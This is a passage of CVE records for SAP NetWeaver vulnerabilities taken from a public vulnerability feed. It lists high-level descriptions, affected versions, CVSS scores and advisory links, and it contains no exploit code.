"dateUpdated": "2024-09-16T22:41:03.833Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2019-0351
Vulnerability from cvelistv5
Published
2019-08-14 13:57
Modified
2024-08-04 17:44
Severity ?
EPSS score ?
Summary
A remote code execution vulnerability exists in the SAP NetWeaver UDDI Server (Services Registry), versions 7.10, 7.20, 7.30, 7.31, 7.40, 7.50. Because of this, an attacker can exploit Services Registry potentially enabling them to take complete control of the product, including viewing, changing, or deleting data by injecting code into the working memory which is subsequently executed by the application. It can also be used to cause a general fault in the product, causing the product to terminate.
References
| ▼ | URL | Tags |
|---|---|---|
| https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=523998017 | x_refsource_MISC | |
| https://launchpad.support.sap.com/#/notes/2800779 | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | SAP SE | SAP NetWeaver UDDI Server (Services Registry) |
Version: < 7.10 Version: < 7.20 Version: < 7.30 Version: < 7.31 Version: < 7.40 Version: < 7.50 |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T17:44:16.464Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=523998017"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/2800779"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "SAP NetWeaver UDDI Server (Services Registry)",
"vendor": "SAP SE",
"versions": [
{
"status": "affected",
"version": "\u003c 7.10"
},
{
"status": "affected",
"version": "\u003c 7.20"
},
{
"status": "affected",
"version": "\u003c 7.30"
},
{
"status": "affected",
"version": "\u003c 7.31"
},
{
"status": "affected",
"version": "\u003c 7.40"
},
{
"status": "affected",
"version": "\u003c 7.50"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A remote code execution vulnerability exists in the SAP NetWeaver UDDI Server (Services Registry), versions 7.10, 7.20, 7.30, 7.31, 7.40, 7.50. Because of this, an attacker can exploit Services Registry potentially enabling them to take complete control of the product, including viewing, changing, or deleting data by injecting code into the working memory which is subsequently executed by the application. It can also be used to cause a general fault in the product, causing the product to terminate."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "others",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-08-14T13:57:00",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=523998017"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://launchpad.support.sap.com/#/notes/2800779"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cna@sap.com",
"ID": "CVE-2019-0351",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "SAP NetWeaver UDDI Server (Services Registry)",
"version": {
"version_data": [
{
"version_name": "\u003c",
"version_value": "7.10"
},
{
"version_name": "\u003c",
"version_value": "7.20"
},
{
"version_name": "\u003c",
"version_value": "7.30"
},
{
"version_name": "\u003c",
"version_value": "7.31"
},
{
"version_name": "\u003c",
"version_value": "7.40"
},
{
"version_name": "\u003c",
"version_value": "7.50"
}
]
}
}
]
},
"vendor_name": "SAP SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A remote code execution vulnerability exists in the SAP NetWeaver UDDI Server (Services Registry), versions 7.10, 7.20, 7.30, 7.31, 7.40, 7.50. Because of this, an attacker can exploit Services Registry potentially enabling them to take complete control of the product, including viewing, changing, or deleting data by injecting code into the working memory which is subsequently executed by the application. It can also be used to cause a general fault in the product, causing the product to terminate."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "others"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=523998017",
"refsource": "MISC",
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=523998017"
},
{
"name": "https://launchpad.support.sap.com/#/notes/2800779",
"refsource": "MISC",
"url": "https://launchpad.support.sap.com/#/notes/2800779"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2019-0351",
"datePublished": "2019-08-14T13:57:00",
"dateReserved": "2018-11-26T00:00:00",
"dateUpdated": "2024-08-04T17:44:16.464Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2024-22124
Vulnerability from cvelistv5
Published
2024-01-09 01:19
Modified
2024-11-14 16:34
Severity ?
EPSS score ?
Summary
Under certain conditions, Internet Communication Manager (ICM) or SAP Web Dispatcher - versions KERNEL 7.22, KERNEL 7.53, KERNEL 7.54, KRNL64UC 7.22, KRNL64UC 7.22EXT, KRNL64UC 7.53, KRNL64NUC 7.22, KRNL64NUC 7.22_EXT, WEBDISP 7.22_EXT, WEBDISP 7.53, WEBDISP 7.54, could allow an attacker to access information which would otherwise be restricted causing high impact on confidentiality.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | SAP_SE | SAP NetWeaver (Internet Communication Manager) |
Version: KERNEL 7.22 Version: KERNEL 7.53 Version: KERNEL 7.54 Version: KRNL64UC 7.22 Version: KRNL64UC 7.22EXT Version: KRNL64UC 7.53 Version: KRNL64NUC 7.22 Version: KRNL64NUC 7.22_EXT Version: WEBDISP 7.22_EXT Version: WEBDISP 7.53 Version: WEBDISP 7.54 |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-01T22:35:34.827Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://me.sap.com/notes/3392626"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-22124",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-01-16T20:23:23.705898Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-11-14T16:34:51.109Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "SAP NetWeaver (Internet Communication Manager)",
"vendor": "SAP_SE",
"versions": [
{
"status": "affected",
"version": "KERNEL 7.22"
},
{
"status": "affected",
"version": "KERNEL 7.53"
},
{
"status": "affected",
"version": "KERNEL 7.54"
},
{
"status": "affected",
"version": "KRNL64UC 7.22"
},
{
"status": "affected",
"version": "KRNL64UC 7.22EXT"
},
{
"status": "affected",
"version": "KRNL64UC 7.53"
},
{
"status": "affected",
"version": "KRNL64NUC 7.22"
},
{
"status": "affected",
"version": "KRNL64NUC 7.22_EXT"
},
{
"status": "affected",
"version": "WEBDISP 7.22_EXT"
},
{
"status": "affected",
"version": "WEBDISP 7.53"
},
{
"status": "affected",
"version": "WEBDISP 7.54"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eUnder certain conditions,\u00a0Internet Communication Manager (ICM) or\u00a0SAP Web Dispatcher - versions KERNEL 7.22, KERNEL 7.53, KERNEL 7.54, KRNL64UC 7.22, KRNL64UC 7.22EXT, KRNL64UC 7.53, KRNL64NUC 7.22, KRNL64NUC 7.22_EXT, WEBDISP 7.22_EXT, WEBDISP 7.53, WEBDISP 7.54, could\u00a0allow an attacker to access information which would otherwise be restricted causing high impact on confidentiality.\u003c/p\u003e"
}
],
"value": "Under certain conditions,\u00a0Internet Communication Manager (ICM) or\u00a0SAP Web Dispatcher - versions KERNEL 7.22, KERNEL 7.53, KERNEL 7.54, KRNL64UC 7.22, KRNL64UC 7.22EXT, KRNL64UC 7.53, KRNL64NUC 7.22, KRNL64NUC 7.22_EXT, WEBDISP 7.22_EXT, WEBDISP 7.53, WEBDISP 7.54, could\u00a0allow an attacker to access information which would otherwise be restricted causing high impact on confidentiality.\n\n"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-497",
"description": "CWE-497: Exposure of Sensitive System Information to an Unauthorized Control Sphere",
"lang": "eng",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-01-09T01:19:55.940Z",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"url": "https://me.sap.com/notes/3392626"
},
{
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Information Disclosure vulnerability in SAP NetWeaver Internet Communication Manager",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2024-22124",
"datePublished": "2024-01-09T01:19:55.940Z",
"dateReserved": "2024-01-05T10:21:35.256Z",
"dateUpdated": "2024-11-14T16:34:51.109Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2020-6181
Vulnerability from cvelistv5
Published
2020-02-12 19:46
Modified
2024-08-04 08:55
Severity ?
EPSS score ?
Summary
Under some circumstances the SAML SSO implementation in the SAP NetWeaver (SAP_BASIS versions 702, 730, 731, 740 and SAP ABAP Platform (SAP_BASIS versions 750, 751, 752, 753, 754), allows an attacker to include invalidated data in the HTTP response header sent to a Web user, leading to HTTP Response Splitting vulnerability.
References
| ▼ | URL | Tags |
|---|---|---|
| https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812 | x_refsource_MISC | |
| https://launchpad.support.sap.com/#/notes/2880744 | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | |||||
|---|---|---|---|---|---|---|---|
| ▼ | SAP SE | SAP NetWeaver (SAP Basis) |
Version: = 7.02 Version: = 7.30 Version: = 7.31 Version: = 7.40 |
||||
|
|||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T08:55:22.112Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/2880744"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "SAP NetWeaver (SAP Basis)",
"vendor": "SAP SE",
"versions": [
{
"status": "affected",
"version": "= 7.02"
},
{
"status": "affected",
"version": "= 7.30"
},
{
"status": "affected",
"version": "= 7.31"
},
{
"status": "affected",
"version": "= 7.40"
}
]
},
{
"product": "SAP ABAP Platform (SAP Basis)",
"vendor": "SAP SE",
"versions": [
{
"status": "affected",
"version": "= 7.50"
},
{
"status": "affected",
"version": "= 7.51"
},
{
"status": "affected",
"version": "= 7.52"
},
{
"status": "affected",
"version": "= 7.53"
},
{
"status": "affected",
"version": "= 7.54"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Under some circumstances the SAML SSO implementation in the SAP NetWeaver (SAP_BASIS versions 702, 730, 731, 740 and SAP ABAP Platform (SAP_BASIS versions 750, 751, 752, 753, 754), allows an attacker to include invalidated data in the HTTP response header sent to a Web user, leading to HTTP Response Splitting vulnerability."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "HTTP Response Splitting",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-02-12T19:46:52",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://launchpad.support.sap.com/#/notes/2880744"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cna@sap.com",
"ID": "CVE-2020-6181",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "SAP NetWeaver (SAP Basis)",
"version": {
"version_data": [
{
"version_name": "=",
"version_value": "7.02"
},
{
"version_name": "=",
"version_value": "7.30"
},
{
"version_name": "=",
"version_value": "7.31"
},
{
"version_name": "=",
"version_value": "7.40"
}
]
}
},
{
"product_name": "SAP ABAP Platform (SAP Basis)",
"version": {
"version_data": [
{
"version_name": "=",
"version_value": "7.50"
},
{
"version_name": "=",
"version_value": "7.51"
},
{
"version_name": "=",
"version_value": "7.52"
},
{
"version_name": "=",
"version_value": "7.53"
},
{
"version_name": "=",
"version_value": "7.54"
}
]
}
}
]
},
"vendor_name": "SAP SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Under some circumstances the SAML SSO implementation in the SAP NetWeaver (SAP_BASIS versions 702, 730, 731, 740 and SAP ABAP Platform (SAP_BASIS versions 750, 751, 752, 753, 754), allows an attacker to include invalidated data in the HTTP response header sent to a Web user, leading to HTTP Response Splitting vulnerability."
}
]
},
"impact": {
"cvss": {
"baseScore": "5.8",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "HTTP Response Splitting"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812",
"refsource": "MISC",
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812"
},
{
"name": "https://launchpad.support.sap.com/#/notes/2880744",
"refsource": "MISC",
"url": "https://launchpad.support.sap.com/#/notes/2880744"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2020-6181",
"datePublished": "2020-02-12T19:46:52",
"dateReserved": "2020-01-08T00:00:00",
"dateUpdated": "2024-08-04T08:55:22.112Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-2363
Vulnerability from cvelistv5
Published
2018-01-09 15:00
Modified
2024-08-05 04:14
Severity ?
EPSS score ?
Summary
SAP NetWeaver, SAP BASIS from 7.00 to 7.02, from 7.10 to 7.11, 7.30, 7.31, 7.40, from 7.50 to 7.52, contains code that allows you to execute arbitrary program code of the user's choice. A malicious user can therefore control the behaviour of the system or can potentially escalate privileges by executing malicious code without legitimate credentials.
References
| ▼ | URL | Tags |
|---|---|---|
| https://blogs.sap.com/2018/01/09/sap-security-patch-day-january-2018/ | x_refsource_CONFIRM | |
| https://launchpad.support.sap.com/#/notes/1906212 | x_refsource_CONFIRM | |
| http://www.securityfocus.com/bid/102449 | vdb-entry, x_refsource_BID | |
| https://launchpad.support.sap.com/#/notes/2525392 | x_refsource_CONFIRM |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | SAP SE | SAP NetWeaver |
Version: 7.00 Version: 7.02 Version: 7.10 Version: 7.11 Version: 7.30 Version: 7.31 Version: 7.40 Version: 7.50 Version: 7.52 |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T04:14:39.709Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://blogs.sap.com/2018/01/09/sap-security-patch-day-january-2018/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/1906212"
},
{
"name": "102449",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/102449"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/2525392"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "SAP NetWeaver",
"vendor": "SAP SE",
"versions": [
{
"status": "affected",
"version": "7.00"
},
{
"status": "affected",
"version": "7.02"
},
{
"status": "affected",
"version": "7.10"
},
{
"status": "affected",
"version": "7.11"
},
{
"status": "affected",
"version": "7.30"
},
{
"status": "affected",
"version": "7.31"
},
{
"status": "affected",
"version": "7.40"
},
{
"status": "affected",
"version": "7.50"
},
{
"status": "affected",
"version": "7.52"
}
]
}
],
"datePublic": "2018-01-09T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "SAP NetWeaver, SAP BASIS from 7.00 to 7.02, from 7.10 to 7.11, 7.30, 7.31, 7.40, from 7.50 to 7.52, contains code that allows you to execute arbitrary program code of the user\u0027s choice. A malicious user can therefore control the behaviour of the system or can potentially escalate privileges by executing malicious code without legitimate credentials."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Code Injection",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-01-11T10:57:01",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://blogs.sap.com/2018/01/09/sap-security-patch-day-january-2018/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://launchpad.support.sap.com/#/notes/1906212"
},
{
"name": "102449",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/102449"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://launchpad.support.sap.com/#/notes/2525392"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cna@sap.com",
"ID": "CVE-2018-2363",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "SAP NetWeaver",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "7.00"
},
{
"version_affected": "=",
"version_value": "7.02"
},
{
"version_affected": "=",
"version_value": "7.10"
},
{
"version_affected": "=",
"version_value": "7.11"
},
{
"version_affected": "=",
"version_value": "7.30"
},
{
"version_affected": "=",
"version_value": "7.31"
},
{
"version_affected": "=",
"version_value": "7.40"
},
{
"version_affected": "=",
"version_value": "7.50"
},
{
"version_affected": "=",
"version_value": "7.52"
}
]
}
}
]
},
"vendor_name": "SAP SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "SAP NetWeaver, SAP BASIS from 7.00 to 7.02, from 7.10 to 7.11, 7.30, 7.31, 7.40, from 7.50 to 7.52, contains code that allows you to execute arbitrary program code of the user\u0027s choice. A malicious user can therefore control the behaviour of the system or can potentially escalate privileges by executing malicious code without legitimate credentials."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Code Injection"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://blogs.sap.com/2018/01/09/sap-security-patch-day-january-2018/",
"refsource": "CONFIRM",
"url": "https://blogs.sap.com/2018/01/09/sap-security-patch-day-january-2018/"
},
{
"name": "https://launchpad.support.sap.com/#/notes/1906212",
"refsource": "CONFIRM",
"url": "https://launchpad.support.sap.com/#/notes/1906212"
},
{
"name": "102449",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/102449"
},
{
"name": "https://launchpad.support.sap.com/#/notes/2525392",
"refsource": "CONFIRM",
"url": "https://launchpad.support.sap.com/#/notes/2525392"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2018-2363",
"datePublished": "2018-01-09T15:00:00",
"dateReserved": "2017-12-15T00:00:00",
"dateUpdated": "2024-08-05T04:14:39.709Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2015-2815
Vulnerability from cvelistv5
Published
2015-04-01 14:00
Modified
2024-08-06 05:24
Severity ?
EPSS score ?
Summary
Buffer overflow in the C_SAPGPARAM function in the NetWeaver Dispatcher in SAP KERNEL 7.00 (7000.52.12.34966) and 7.40 (7400.12.21.30308) allows remote authenticated users to cause a denial of service or possibly execute arbitrary code via unspecified vectors, aka SAP Security Note 2063369.
References
| ▼ | URL | Tags |
|---|---|---|
| http://seclists.org/fulldisclosure/2015/Jun/61 | mailing-list, x_refsource_FULLDISC | |
| http://packetstormsecurity.com/files/132353/SAP-NetWeaver-Dispatcher-Buffer-Overflow.html | x_refsource_MISC | |
| http://www.securityfocus.com/archive/1/535825/100/800/threaded | mailing-list, x_refsource_BUGTRAQ | |
| http://www.securityfocus.com/bid/73897 | vdb-entry, x_refsource_BID | |
| https://erpscan.io/advisories/erpscan-15-003-sapkernel-c_sapgparam-rce-dos/ | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T05:24:38.938Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20150623 ERPSCAN Research Advisory [ERPSCAN-15-003] SAP NetWeaver Dispatcher Buffer Overflow - RCE, DoS",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2015/Jun/61"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/132353/SAP-NetWeaver-Dispatcher-Buffer-Overflow.html"
},
{
"name": "20150625 [ERPSCAN-15-003] SAP NetWeaver Dispatcher Buffer Overflow - RCE, DoS",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/535825/100/800/threaded"
},
{
"name": "73897",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/73897"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-15-003-sapkernel-c_sapgparam-rce-dos/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2015-02-15T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in the C_SAPGPARAM function in the NetWeaver Dispatcher in SAP KERNEL 7.00 (7000.52.12.34966) and 7.40 (7400.12.21.30308) allows remote authenticated users to cause a denial of service or possibly execute arbitrary code via unspecified vectors, aka SAP Security Note 2063369."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20150623 ERPSCAN Research Advisory [ERPSCAN-15-003] SAP NetWeaver Dispatcher Buffer Overflow - RCE, DoS",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2015/Jun/61"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/132353/SAP-NetWeaver-Dispatcher-Buffer-Overflow.html"
},
{
"name": "20150625 [ERPSCAN-15-003] SAP NetWeaver Dispatcher Buffer Overflow - RCE, DoS",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/535825/100/800/threaded"
},
{
"name": "73897",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/73897"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-15-003-sapkernel-c_sapgparam-rce-dos/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2015-2815",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in the C_SAPGPARAM function in the NetWeaver Dispatcher in SAP KERNEL 7.00 (7000.52.12.34966) and 7.40 (7400.12.21.30308) allows remote authenticated users to cause a denial of service or possibly execute arbitrary code via unspecified vectors, aka SAP Security Note 2063369."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20150623 ERPSCAN Research Advisory [ERPSCAN-15-003] SAP NetWeaver Dispatcher Buffer Overflow - RCE, DoS",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2015/Jun/61"
},
{
"name": "http://packetstormsecurity.com/files/132353/SAP-NetWeaver-Dispatcher-Buffer-Overflow.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/132353/SAP-NetWeaver-Dispatcher-Buffer-Overflow.html"
},
{
"name": "20150625 [ERPSCAN-15-003] SAP NetWeaver Dispatcher Buffer Overflow - RCE, DoS",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/535825/100/800/threaded"
},
{
"name": "73897",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/73897"
},
{
"name": "https://erpscan.io/advisories/erpscan-15-003-sapkernel-c_sapgparam-rce-dos/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-15-003-sapkernel-c_sapgparam-rce-dos/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2015-2815",
"datePublished": "2015-04-01T14:00:00",
"dateReserved": "2015-04-01T00:00:00",
"dateUpdated": "2024-08-06T05:24:38.938Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2012-2611
Vulnerability from cvelistv5
Published
2012-05-15 01:00
Modified
2024-08-06 19:42
Severity ?
EPSS score ?
Summary
The DiagTraceR3Info function in the Dialog processor in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2, when a certain Developer Trace configuration is enabled, allows remote attackers to execute arbitrary code via a crafted SAP Diag packet.
References
| ▼ | URL | Tags |
|---|---|---|
| https://service.sap.com/sap/support/notes/1687910 | x_refsource_MISC | |
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM | |
| http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities | x_refsource_MISC | |
| http://www.securitytracker.com/id?1027052 | vdb-entry, x_refsource_SECTRACK |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T19:42:30.660Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"name": "1027052",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1027052"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
